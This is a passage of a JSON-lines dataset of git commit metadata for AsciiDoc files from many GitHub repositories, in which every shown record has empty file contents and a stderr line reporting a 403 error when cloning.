tabular description","message":"enhanced \"improvement-backlog\", moved to its own file, first version of tabular description\n","repos":"aim42\/aim42,kitenco\/aim42,feststelltaste\/aim42,aim42\/aim42,kitenco\/aim42,rschimmack\/aim42,rschimmack\/aim42,feststelltaste\/aim42","old_file":"src\/main\/asciidoc\/patterns\/crosscutting\/improvement-backlog.adoc","new_file":"src\/main\/asciidoc\/patterns\/crosscutting\/improvement-backlog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rschimmack\/aim42.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bdb1238fdb9aa3206c6f4c1fe091c0ca55bf1c19","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fadf04eff77698a671961a83570c897f0cdea39f","subject":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","message":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-19-Unboxing-Google-Home-Mini-With-Demar-DeRozan.adoc","new_file":"_posts\/2017-12-19-Unboxing-Google-Home-Mini-With-Demar-DeRozan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cb88a55178cac497f0e03bfe4e4de001bd846ec","subject":"Add instructions for how to generate artifacts","message":"Add instructions for how to generate artifacts\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"grammar\/README.adoc","new_file":"grammar\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ffc5be85309ef150c99a56a87d94e6e6448277b","subject":"WICKET-6395 removed reference to no longer existing factory method Link#onClick","message":"WICKET-6395 removed reference to no longer existing factory method\nLink#onClick\n","repos":"selckin\/wicket,bitstorm\/wicket,mosoft521\/wicket,dashorst\/wicket,aldaris\/wicket,selckin\/wicket,aldaris\/wicket,apache\/wicket,apache\/wicket,bitstorm\/wicket,mosoft521\/wicket,bitstorm\/wicket,mosoft521\/wicket,apache\/wicket,dashorst\/wicket,dashorst\/wicket,apache\/wicket,selckin\/wicket,selckin\/wicket,dashorst\/wicket,aldaris\/wicket,bitstorm\/wicket,bitstorm\/wicket,mosoft521\/wicket,dashorst\/wicket,mosoft521\/wicket,apache\/wicket,selckin\/wicket,aldaris\/wicket,aldaris\/wicket","old_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld\/helloWorld_4.adoc","new_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld\/helloWorld_4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wicket.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae38cfbaec24ed4ab5a28f091e2c9173ab06ea58","subject":"[DOCS] Update getting-started.asciidoc (#29518)","message":"[DOCS] Update getting-started.asciidoc (#29518)\n\nHighlighted that you can change shard counts using `_shrink` and `_split`.","repos":"GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8703127fe64838c3466dea173da984eaa66770ee","subject":"Added IoCs for Kasidet","message":"Added IoCs for Kasidet\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"kasidet\/README.adoc","new_file":"kasidet\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"62bfcd9887b721e0c29888ea433495fbdf329a05","subject":"y2b create post GUY THROWS iPad OUT WINDOW!","message":"y2b create post GUY THROWS iPad OUT WINDOW!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-28-GUY-THROWS-iPad-OUT-WINDOW.adoc","new_file":"_posts\/2012-03-28-GUY-THROWS-iPad-OUT-WINDOW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68cdd4af9cc36544a5f32f46272cfd9830fa866e","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8303dbcace359ac1f426a9c831e4dc380ccc23ae","subject":"Update 2017-02-04-hello-world.adoc","message":"Update 2017-02-04-hello-world.adoc","repos":"uxc\/uxc.github.io,uxc\/uxc.github.io,uxc\/uxc.github.io,uxc\/uxc.github.io","old_file":"_posts\/2017-02-04-hello-world.adoc","new_file":"_posts\/2017-02-04-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uxc\/uxc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35f2c8a09ed8fec0d1d394910f233a2cfa37d66a","subject":"Update 2018-03-14-golangphper.adoc","message":"Update 2018-03-14-golangphper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-14-golangphper.adoc","new_file":"_posts\/2018-03-14-golangphper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44351567696c641df917a0bf6f756e70945dc58a","subject":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"930cfde5baa6dc342d2beb729e50e4ac83465f99","subject":"create post Unboxing The World's Smallest Phone","message":"create post Unboxing The World's Smallest Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-The-Worlds-Smallest-Phone.adoc","new_file":"_posts\/2018-02-26-Unboxing-The-Worlds-Smallest-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3de28fdaf22f0581ab55e4b0ccaf362713a4e2b2","subject":"y2b create post Jumping Sumo Robot Demo (CES 2014)","message":"y2b create post Jumping Sumo Robot Demo (CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-09-Jumping-Sumo-Robot-Demo-CES-2014.adoc","new_file":"_posts\/2014-01-09-Jumping-Sumo-Robot-Demo-CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c39bbb74073d97d45f7dde41294a140b8b25027","subject":"Update to reference doc","message":"Update to reference doc\n","repos":"spring-projects\/spring-social-facebook,rams2588\/spring-social-facebook,pjkCochin\/spring-social-facebook,dtrunk90\/spring-social-facebook,spring-projects\/spring-social-facebook,pjkCochin\/spring-social-facebook,rams2588\/spring-social-facebook,dtrunk90\/spring-social-facebook","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjkCochin\/spring-social-facebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39763e10e35eebae0c159907ea5389af33890af5","subject":"Update 2015-07-01-Old-post.adoc","message":"Update 2015-07-01-Old-post.adoc","repos":"mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io","old_file":"_posts\/2015-07-01-Old-post.adoc","new_file":"_posts\/2015-07-01-Old-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mathieu-pousse\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742153fc22a4798674cc5b821656a57165dac13c","subject":"Add a GitHub SUPPORT document","message":"Add a GitHub SUPPORT document\n","repos":"tiarebalbi\/spring-boot,jxblum\/spring-boot,htynkn\/spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,royclarkson\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,bclozel\/spring-boot,ilayaperumalg\/spring-boot,zhanhb\/spring-boot,htynkn\/spring-boot,mdeinum\/spring-boot,habuma\/spring-boot,vakninr\/spring-boot,linead\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,ptahchiev\/spring-boot,olivergierke\/spring-boot,vakninr\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,isopov\/spring-boot,vpavic\/spring-boot,zhanhb\/spring-boot,mdeinum\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,chrylis\/spring-boot,mosoft521\/spring-boot,hello2009chen\/spring-boot,eddumelendez\/spring-boot,pvorb\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,eddumelendez\/spring-boot,bbrouwer\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,linead\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,ptahchiev\/spring-boot,ihoneymon\/spring-boot,ptahchiev\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,lburgazzoli\/spring-boot,tiarebalbi\/spring-boot,olivergierke\/spring-boot,vakninr\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,kdvolder\/spring-boot,spring-projects\/spring-boot,felipeg48\/spring-boot,ilayaperumalg\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,Buzzardo\/spring-boot,vpavic\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,pvorb\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,bclozel\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,mdeinum\/spring-boot,ptahchiev\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,yangdd1205\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,rweisleder\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,habuma\/spring-boot,NetoDevel\/spring-boot,bjornlindstrom\/spring-boot,dreis2211\/spring-boot,mbenson\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,habuma\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,olivergierke\/spring-boot,donhuvy\/spring-boot,tsachev\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,bjornlindstrom\/spring-boot,scottfrederick\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,olivergierke\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,spring-projects\/spring-boot,hello2009chen\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,pvorb\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot,isopov\/spring-boot,htynkn\/spring-boot,vakninr\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,vakninr\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,zhanhb\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,bbrouwer\/spring-boot,joshiste\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,bbrouwer\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,tsachev\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,shakuzen\/spring-boot,bbrouwer\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,yangdd1205\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,bjornlindstrom\/spring-boot,bbrouwer\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot","old_file":"SUPPORT.adoc","new_file":"SUPPORT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5355b23bdbbf77ec67df4b4e4c8edeee0e230b9","subject":" ISIS-1819 add @Parent to annotation ref. guide","message":" ISIS-1819 add @Parent to annotation ref. guide","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgant\/_rgant-Parent.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgant\/_rgant-Parent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9ce99de740960a04dcc6698eec80e2861fc7942","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a0c78a1891e30a24004619476250050af3b4ec3","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62b26a12eeaddb70e4a5b7dabad11a59de6f3a36","subject":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","message":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50af665559bd375d4f3cb39a190ea68cd3c61281","subject":"URL fix","message":"URL fix\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"186639af40df5f693dac2cbe031c581640e1cc70","subject":"darken image","message":"darken image\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"pages\/download.adoc","new_file":"pages\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20f70d9177420f9231f62f315c2a42566c499155","subject":"doc\/pages: Add command-parsing.asciidoc to describe command line parsing","message":"doc\/pages: Add command-parsing.asciidoc to describe command line parsing\n","repos":"Somasis\/kakoune,Somasis\/kakoune,mawww\/kakoune,casimir\/kakoune,jkonecny12\/kakoune,jkonecny12\/kakoune,lenormf\/kakoune,occivink\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,mawww\/kakoune,mawww\/kakoune,casimir\/kakoune,lenormf\/kakoune,casimir\/kakoune,Somasis\/kakoune,jjthrash\/kakoune,lenormf\/kakoune,danr\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,danr\/kakoune,jkonecny12\/kakoune,danr\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,casimir\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,Somasis\/kakoune,occivink\/kakoune,occivink\/kakoune,danr\/kakoune,lenormf\/kakoune","old_file":"doc\/pages\/command-parsing.asciidoc","new_file":"doc\/pages\/command-parsing.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjthrash\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"be47aa077239239011fd0d497e1181b4afa3bce6","subject":"Update 2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","message":"Update 2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"381f5914f4482eba7efaf0e5dbd5f37b68aadbd6","subject":"Update 2017-04-12-Royal-amp-Select-Master-Degrees.adoc","message":"Update 2017-04-12-Royal-amp-Select-Master-Degrees.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-04-12-Royal-amp-Select-Master-Degrees.adoc","new_file":"_posts\/2017-04-12-Royal-amp-Select-Master-Degrees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f851678bc0114e44aaad7987cb9258fe37bd971","subject":"Add README","message":"Add README\n","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"riff-cli\/README.adoc","new_file":"riff-cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12ebe77e4ae5abc137680029178a7e953de20ca4","subject":"docs: hide encodefunctionCall","message":"docs: hide encodefunctionCall","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30738c97e1b3344c26b3f5966f9942cf6ed7f4d6","subject":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","message":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"702efaff9bb43acc05f342105f227201af470b08","subject":"Update 2015-08-15-Ola-Mundo.adoc","message":"Update 2015-08-15-Ola-Mundo.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-15-Ola-Mundo.adoc","new_file":"_posts\/2015-08-15-Ola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31184709a2748ff40ad13969805669afafadce91","subject":"Update 2016-03-15-namespace.adoc","message":"Update 2016-03-15-namespace.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-15-namespace.adoc","new_file":"_posts\/2016-03-15-namespace.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba583842b2f12d0beb9ba73aa4e0d6cd44e98dee","subject":"Update 2016-06-11-Hong-Kong.adoc","message":"Update 2016-06-11-Hong-Kong.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-11-Hong-Kong.adoc","new_file":"_posts\/2016-06-11-Hong-Kong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"477f44d29e70f082e546f94a4fac616e22743393","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d115ffb730f87f4634d7bfe2fc63d0580c6d35c5","subject":"Update 2015-08-10-Github.adoc","message":"Update 